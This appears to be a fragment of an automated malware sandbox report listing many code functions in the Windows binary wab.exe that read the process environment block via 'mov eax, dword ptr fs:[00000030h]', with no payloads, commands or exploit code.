Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22457208 mov eax, dword ptr fs:[00000030h] 20_2_22457208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22457208 mov eax, dword ptr fs:[00000030h] 20_2_22457208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5227 mov eax, dword ptr fs:[00000030h] 20_2_224F5227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241823B mov eax, dword ptr fs:[00000030h] 20_2_2241823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h] 20_2_2242A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h] 20_2_2242A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h] 20_2_2242A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h] 20_2_2242A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A2C3 mov eax, dword ptr fs:[00000030h] 20_2_2242A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B2C0 mov eax, dword ptr fs:[00000030h] 20_2_2244B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224292C5 mov eax, dword ptr fs:[00000030h] 20_2_224292C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224292C5 mov eax, dword ptr fs:[00000030h] 20_2_224292C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B2D3 mov eax, dword ptr fs:[00000030h] 20_2_2241B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B2D3 mov eax, dword ptr fs:[00000030h] 20_2_2241B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241B2D3 mov eax, dword ptr fs:[00000030h] 20_2_2241B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244F2D0 mov eax, dword ptr fs:[00000030h] 20_2_2244F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244F2D0 mov eax, dword ptr fs:[00000030h] 20_2_2244F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224D12ED mov eax, dword ptr fs:[00000030h] 20_2_224D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224302E1 mov eax, dword ptr fs:[00000030h] 20_2_224302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224302E1 mov eax, dword ptr fs:[00000030h] 20_2_224302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224302E1 mov eax, dword ptr fs:[00000030h] 20_2_224302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F52E2 mov eax, dword ptr fs:[00000030h] 20_2_224F52E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF2F8 mov eax, dword ptr fs:[00000030h] 20_2_224DF2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224192FF mov eax, dword ptr fs:[00000030h] 20_2_224192FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245E284 mov eax, dword ptr fs:[00000030h] 20_2_2245E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245E284 mov eax, dword ptr fs:[00000030h] 20_2_2245E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A0283 mov eax, dword ptr fs:[00000030h] 20_2_224A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A0283 mov eax, dword ptr fs:[00000030h] 20_2_224A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A0283 mov eax, dword ptr fs:[00000030h] 20_2_224A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5283 mov eax, dword ptr fs:[00000030h] 20_2_224F5283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245329E mov eax, dword ptr fs:[00000030h] 20_2_2245329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245329E mov eax, dword ptr fs:[00000030h] 20_2_2245329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224302A0 mov eax, dword ptr fs:[00000030h] 20_2_224302A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224302A0 mov eax, dword ptr fs:[00000030h] 20_2_224302A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h] 20_2_224352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h] 20_2_224352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h] 20_2_224352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224352A0 mov eax, dword ptr fs:[00000030h] 20_2_224352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h] 20_2_224E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h] 20_2_224E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h] 20_2_224E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E92A6 mov eax, dword ptr fs:[00000030h] 20_2_224E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B72A0 mov eax, dword ptr fs:[00000030h] 20_2_224B72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B72A0 mov eax, dword ptr fs:[00000030h] 20_2_224B72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov ecx, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224B62A0 mov eax, dword ptr fs:[00000030h] 20_2_224B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A92BC mov eax, dword ptr fs:[00000030h] 20_2_224A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A92BC mov eax, dword ptr fs:[00000030h] 20_2_224A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A92BC mov ecx, dword ptr fs:[00000030h] 20_2_224A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A92BC mov ecx, dword ptr fs:[00000030h] 20_2_224A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A2349 mov eax, dword ptr fs:[00000030h] 20_2_224A2349
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D34C mov eax, dword ptr fs:[00000030h] 20_2_2241D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241D34C mov eax, dword ptr fs:[00000030h] 20_2_2241D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5341 mov eax, dword ptr fs:[00000030h] 20_2_224F5341
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419353 mov eax, dword ptr fs:[00000030h] 20_2_22419353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22419353 mov eax, dword ptr fs:[00000030h] 20_2_22419353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov eax, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov eax, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov eax, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov ecx, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov eax, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A035C mov eax, dword ptr fs:[00000030h] 20_2_224A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224EA352 mov eax, dword ptr fs:[00000030h] 20_2_224EA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF367 mov eax, dword ptr fs:[00000030h] 20_2_224DF367
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224C437C mov eax, dword ptr fs:[00000030h] 20_2_224C437C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22427370 mov eax, dword ptr fs:[00000030h] 20_2_22427370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22427370 mov eax, dword ptr fs:[00000030h] 20_2_22427370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22427370 mov eax, dword ptr fs:[00000030h] 20_2_22427370
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A930B mov eax, dword ptr fs:[00000030h] 20_2_224A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A930B mov eax, dword ptr fs:[00000030h] 20_2_224A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A930B mov eax, dword ptr fs:[00000030h] 20_2_224A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A30B mov eax, dword ptr fs:[00000030h] 20_2_2245A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A30B mov eax, dword ptr fs:[00000030h] 20_2_2245A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2245A30B mov eax, dword ptr fs:[00000030h] 20_2_2245A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241C310 mov ecx, dword ptr fs:[00000030h] 20_2_2241C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22440310 mov ecx, dword ptr fs:[00000030h] 20_2_22440310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E132D mov eax, dword ptr fs:[00000030h] 20_2_224E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E132D mov eax, dword ptr fs:[00000030h] 20_2_224E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244F32A mov eax, dword ptr fs:[00000030h] 20_2_2244F32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22417330 mov eax, dword ptr fs:[00000030h] 20_2_22417330
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DC3CD mov eax, dword ptr fs:[00000030h] 20_2_224DC3CD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2242A3C0 mov eax, dword ptr fs:[00000030h] 20_2_2242A3C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h] 20_2_224283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h] 20_2_224283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h] 20_2_224283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224283C0 mov eax, dword ptr fs:[00000030h] 20_2_224283C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A63C0 mov eax, dword ptr fs:[00000030h] 20_2_224A63C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DB3D0 mov ecx, dword ptr fs:[00000030h] 20_2_224DB3D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224303E9 mov eax, dword ptr fs:[00000030h] 20_2_224303E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224DF3E6 mov eax, dword ptr fs:[00000030h] 20_2_224DF3E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F53FC mov eax, dword ptr fs:[00000030h] 20_2_224F53FC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E3F0 mov eax, dword ptr fs:[00000030h] 20_2_2243E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E3F0 mov eax, dword ptr fs:[00000030h] 20_2_2243E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E3F0 mov eax, dword ptr fs:[00000030h] 20_2_2243E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224563FF mov eax, dword ptr fs:[00000030h] 20_2_224563FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241E388 mov eax, dword ptr fs:[00000030h] 20_2_2241E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241E388 mov eax, dword ptr fs:[00000030h] 20_2_2241E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241E388 mov eax, dword ptr fs:[00000030h] 20_2_2241E388
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244438F mov eax, dword ptr fs:[00000030h] 20_2_2244438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244438F mov eax, dword ptr fs:[00000030h] 20_2_2244438F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F539D mov eax, dword ptr fs:[00000030h] 20_2_224F539D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22418397 mov eax, dword ptr fs:[00000030h] 20_2_22418397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22418397 mov eax, dword ptr fs:[00000030h] 20_2_22418397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22418397 mov eax, dword ptr fs:[00000030h] 20_2_22418397
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2247739A mov eax, dword ptr fs:[00000030h] 20_2_2247739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2247739A mov eax, dword ptr fs:[00000030h] 20_2_2247739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224433A5 mov eax, dword ptr fs:[00000030h] 20_2_224433A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224533A0 mov eax, dword ptr fs:[00000030h] 20_2_224533A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224533A0 mov eax, dword ptr fs:[00000030h] 20_2_224533A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22422050 mov eax, dword ptr fs:[00000030h] 20_2_22422050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224C705E mov ebx, dword ptr fs:[00000030h] 20_2_224C705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224C705E mov eax, dword ptr fs:[00000030h] 20_2_224C705E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244B052 mov eax, dword ptr fs:[00000030h] 20_2_2244B052
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A6050 mov eax, dword ptr fs:[00000030h] 20_2_224A6050
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A106E mov eax, dword ptr fs:[00000030h] 20_2_224A106E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224F5060 mov eax, dword ptr fs:[00000030h] 20_2_224F5060
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov ecx, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_22431070 mov eax, dword ptr fs:[00000030h] 20_2_22431070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2244C073 mov eax, dword ptr fs:[00000030h] 20_2_2244C073
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D070 mov ecx, dword ptr fs:[00000030h] 20_2_2249D070
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A4000 mov ecx, dword ptr fs:[00000030h] 20_2_224A4000
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h] 20_2_2243E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h] 20_2_2243E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h] 20_2_2243E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2243E016 mov eax, dword ptr fs:[00000030h] 20_2_2243E016
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241A020 mov eax, dword ptr fs:[00000030h] 20_2_2241A020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2241C020 mov eax, dword ptr fs:[00000030h] 20_2_2241C020
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E903E mov eax, dword ptr fs:[00000030h] 20_2_224E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E903E mov eax, dword ptr fs:[00000030h] 20_2_224E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E903E mov eax, dword ptr fs:[00000030h] 20_2_224E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224E903E mov eax, dword ptr fs:[00000030h] 20_2_224E903E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov ecx, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224370C0 mov eax, dword ptr fs:[00000030h] 20_2_224370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D0C0 mov eax, dword ptr fs:[00000030h] 20_2_2249D0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2249D0C0 mov eax, dword ptr fs:[00000030h] 20_2_2249D0C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224A20DE mov eax, dword ptr fs:[00000030h] 20_2_224A20DE
